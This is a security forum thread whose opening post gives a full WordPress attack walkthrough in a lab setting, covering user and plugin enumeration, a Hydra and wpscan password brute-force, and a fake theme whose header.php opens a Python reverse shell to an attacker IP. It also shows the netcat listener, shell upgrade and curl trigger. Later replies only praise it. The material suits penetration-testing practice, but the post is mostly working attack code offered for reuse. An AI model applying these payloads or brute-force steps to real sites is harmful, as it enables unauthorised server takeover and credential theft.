October 23, 2017, 06:37:46 AM
Welcome, Guest. Please login or register.

Author Topic: Getting shell after admin access in WordPress site  (Read 1310 times)

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1249
  • Internets: +193/-0
Getting shell after admin access in WordPress site
« on: March 30, 2017, 07:16:43 AM »
WordPress site enumeration and pwning;

The below has not been tested on many versions, so your mileage using the below tactics might well vary..
(the IPs are different in some exampels as post created and tested using 2 seperate machines)

When testing WordPress sites, one would usually follow something similar to;
  • Enumeration
  • Weak Credential auditing
  • Privilege escalation of non-admin user(s)
  • Obtaining shell access to server

1. WordPress site enumeration
  • WordPress version enumeration
  • User(s) enumeration
  • Plugin & Theme enumeration
WordPress version enumeration
There are a few methods you can try;
- Check the page source for 'generator' tags;
Code: [Select]
curl -s 192.168.56.102/wordpress/ | grep generator
- Check if the readme.html is available in the root of the WordPress installation;
   (readme.html will show WordPress version information at the top)
Code: [Select]
curl -s 192.168.56.102/wordpress/readme.html | grep Version

 - Check the source of the login page; /wordpress-site/wp-login.php
Code: [Select]
curl -s 192.168.56.102/wordpress/wp-login.php | grep "ver="




WordPress user(s) enumeration
On default installations users can be found by checking the user IDs;
http://webpage/wordpress_site/?author=1
with a nice one liner using curl and grep you can do a quick emumeration of the 1st 5 users;
Code: [Select]

for i in $(seq 1 5); do curl -s 192.168.110.105/wordpress/?author=$i | grep '<title>'; done


Cool, 2 users enumerated.

It is actually a good idea to include the -L switch to ensure that you don't miss anything with redirects.
Code: [Select]
for i in $(seq 1 5); do curl -sL 192.168.110.105/wordpress/?author=$i | grep '<title>'; done

In WordPress installations with the 'stop-user-enumeration' plugin installed other approaches could be considered;
Code: [Select]

curl -i -sL '192.168.56.102/wordpress/?wp-comments-post&author=1' | grep '<title>'

or

Code: [Select]

curl -sL 192.168.56.102/wordpress/?wp-comments-post -d author=1 | grep '<title>'


In WordPress 4.7 a REST API was introduced to list all users which opens up other methods to view users;
Code: [Select]
curl -s http://localhost/wp-json/wp/v2/users
https://security.dxw.com/advisories/stop-user-enumeration-does-not-stop-user-enumeration/


WordPress Plugin & Theme enumeration
If you are lucky you will be able to browse the /wordpress_site/wp-content/plugins/ and the /wordpress_site/wp-content/themes/  directory and get a nice easy overview of what plugins and themes are installed, but this isn't very likely.

You could also fuzz the directories using wordlists specifically prepared for WordPress.

seclists has some great ones and has a decent CMS section, although from my tests it didnt catch the themes.


You could for instance fuzz the plugin directory and then enumerate further on found directories to get version numbers etc.
Code: [Select]
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/CMS/wp_plugins.fuzz.txt --hc 404 192.168.56.104/wordpress/FUZZ



Another alternative is to use an nmap nse script  to do the hard work for you;
Code: [Select]

nmap -sV -p 80 192.168.56.102 --script=http-wordpress-enum.nse --script-args=http-wordpress-enum.root=/wordpress/



2. Weak WordPress credential auditing
With our found admin user in our hands, lets run a quick test login with admin:nimda as credentials to see what the form information is.We can get the nitty gritty details with Inspect Element in the browser;

With this new-found information we can quickly make a username file and fire up a quick bruteforce attack on the wordpress login page to check for weak password usage;
Code: [Select]
echo admin > users.txt && echo wpuser >> users.txt
hydra -L users.txt -P lists/500.txt -e nsr 192.168.110.105 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location"



Awesome, there are our credentials (yes ch3rn.. it took me a looong time to get that hydra command sorted.. :D ) ;
admin:admin
wpuser:wpuser

+--------------------------------------------------------------------------------------+
Alternative methods (much easier lol.. but we like complicated do we not?!) ;
Enumerate users, plugins and themes;
Code: [Select]
wpscan -u http://192.168.110.105/wordpress/ -e u,ap,at

Brute forcing these enumerated users;
Code: [Select]
wpscan --users users.txt -w /root/lists/500.txt -u 192.168.110.105/wordpress/
+--------------------------------------------------------------------------------------+

3. Privilege escalation of non-admin user(s)
If you weren't lucky enough to get admin credentials, there may still be a way to escalate a lesser privileged user to admin privileges.

This is where the plugin and theme enumeration comes in; WordPress itself does not often appear to have privilege escalation vulnerabilities of this nature, but plugins and themes occasionally do.

Doing a quick searchsploit of wordpress escalation exploits gives a few responses, and this route is worth a quick check with the enumerated plugins and themes.
Code: [Select]
searchsploit wordpress escalation



Failing this, the enumerated plugins and themes should always be checked for exploits, which can range from information disclosure to unauthenticated LFI / RFI / RCE.


4. Obtaining shell access to server
With our nice new shiny admin creds, we head over to the wordpress Dashboard as admin, and get access to themes and plugins and the ability to install new ones.. ooohh yeah..

If you are admin, you can create a fake plugin with a reverse shell so that on activation of the plugin, shell can be obtained.
You can also edit the 'header.php' file of the active Theme into a reverse shell so that on refreshing of the site, reverse shell is obtained.
The drawback is that this means you have to make a semi-permanent change to files and it can cause issues when trying to get back to the site, so I have been looking at alternative ways, but possible methods include;
  • Editing the main header.php script of the WordPress site to contain a reverse shell.
  • Uploading a fake plugin containing a reverse shell.
  • Uploading a fake theme containing a reverse shell.
WordPress Themes

It is trivial to actually create your own fake theme including a reverse shell, upload and have a shell spawned by using the Live Preview only. This means there are no changes made to any files and a nice clean way to get a reverse shell. So what do we need..First to see which files are required to create a WordPress theme;https://developer.wordpress.org/themes/release/required-theme-files/
  • style.css
  • index.php
  • comments.php
  • screenshot.png
I also included a header.php file which is called by index.php, the header.php is where the php reverse shell is.
(the IP and PORT need to be changed to suit your setup)So we need to create these files, bundle into a folder and zip it up to create the WP theme.
This is the content of my fake-theme zip file;

STYLE.CSS
Code: [Select]
/*   
   Theme Name:        FAKE WordPress Theme
   Description:       A theme to be installed to allow execution of a shell using Theme Live Preview.
   Author:            TAPE
   Version:           1.0
   License:           Ours Not Yours
   License URI:       Ours
   Tags:              edit IP and PORT in header.php as required, run netcat listener, click on live preview, check for shell
   Text Domain:       fake-theme
*/
INDEX.PHP
Code: [Select]
<?php get_header(); ?>
COMMENTS.PHP
Code: [Select]
I actually left this completely blank, possibly could have placed reverse shell code here and have the index.php call comments.php instead of header.php..I'm not sure..
\_(?)_/
HEADER.PHP
Code: [Select]
<?php echo shell_exec(`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.101",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`);?>
SCREENSHOT.PNG
I decided to make a .png file which is shown in the wordpress Theme page, just so you know which one to click on :D


Nice and subtle yeah? So, when you bundle all those files in a directory, zip it up and upload to Themes in the WordPress Dashboard, you can start your netcat listener on your attacking machine, click on the theme and choose Live Preview to get your shell.

fake-theme file for those interested;http://www.mediafire.com/file/ya0qn83o0b5e3lu/fake-theme.zip

So, now when we log into the wordpress site as admin and head over to the Dashboard and the theme section, we can install this beautiful new fake theme.

After installation and viewing the Themes again we see the following;




Now when we click on the fake theme, we are presented with some information, can activate, do a Live Preview or delete.




The Live Preview won't activate it, but it will run it as a preview, and as a consequence run the php reverse shell, yeah baby..
Of course we also spawn a nicer shell and set the environment for ease of use;
Code: [Select]
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux




Now we can continue on our quest to root, knowing that we have not damaged or altered the server (VM) and can use that same method to gain shell access again with ease.

As the theme is now installed, you can also access/load the reverse shell using curl from your attacking machine should the browser live-demo methof be giving you any grief;

Start listener;
Code: [Select]
nc -lvp 31337

Access/load the reverse shell located in header.php with curl;
Code: [Select]
curl 192.168.56.102/wordpress/wp-content/themes/fake-theme/header.php





Hope the above of some interest to you guys & gals!
« Last Edit: April 06, 2017, 02:21:10 AM by TAPE »
Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

Offline kinchan

  • Experienced
  • ***
  • Posts: 183
  • Internets: +17/-0
  • Love My Pi and my N900
Re: Getting shell after admin access in WordPress site
« Reply #1 on: March 30, 2017, 11:41:03 AM »
interesting, I will try this .. thank you TAPE!
"Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime."
##### Current project >> otto-gui ##### website #####

Offline Amonsec

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 49
  • Internets: +36/-0
  • 1336 working to become 1337
Re: Getting shell after admin access in WordPress site
« Reply #2 on: March 30, 2017, 12:44:42 PM »
Nice one dude. +1
This post can be usefull for the Mr. Robot VulnHub challenge.  :)
"A computer is only as good as it's user" - R4V3N
OSCP (2017)

Offline Grey-Matter

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 112
  • Internets: +57/-0
Re: Getting shell after admin access in WordPress site
« Reply #3 on: March 30, 2017, 12:45:38 PM »
friggin awesome brotha. love that user enum trick too. much quicker than breaking out a scanner. great job all  around, thanks for the new knowledge. keep beastin

Offline H4v0K

  • Administrator
  • Elite
  • *****
  • Posts: 1019
  • Internets: +986/-1
Re: Getting shell after admin access in WordPress site
« Reply #4 on: March 30, 2017, 01:50:52 PM »
Nice  8)  . Thanks for sharing +1

Offline doctane

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 154
  • Internets: +14/-0
  • Never should of trusted hollywood!
    • Public key
Re: Getting shell after admin access in WordPress site
« Reply #5 on: March 30, 2017, 03:32:23 PM »
Mad skills!  +2  8)
---
Don't blink, don't move. You feel that, as your worries fade away? You hear that? That's the Sound of Madness, calling for you!

Offline ch3rn0byl

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 187
  • Internets: +1337/-0
  • Grumpy Old Man with Mounds of Salt
Re: Getting shell after admin access in WordPress site
« Reply #6 on: March 30, 2017, 06:14:28 PM »
dude, sick man! too sick!!

The quieter you become, the more you are unlikely to sound stupid.

Offline Malachai

  • Top Hat Member
  • Super Elite
  • ********
  • Posts: 2805
  • Internets: +18/-7
  • #!/bin/sh Day/Night (Grey Hat)
Re: Getting shell after admin access in WordPress site
« Reply #7 on: March 30, 2017, 07:47:45 PM »
Great job!!!
** Dont' judge me! **

*//
  Hope that Firewall works because your SCREWED  
  //*

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Getting shell after admin access in WordPress site
« Reply #8 on: March 31, 2017, 03:43:29 PM »
Very cool TAPE!
A computer is only as strong as its user! -R4v3n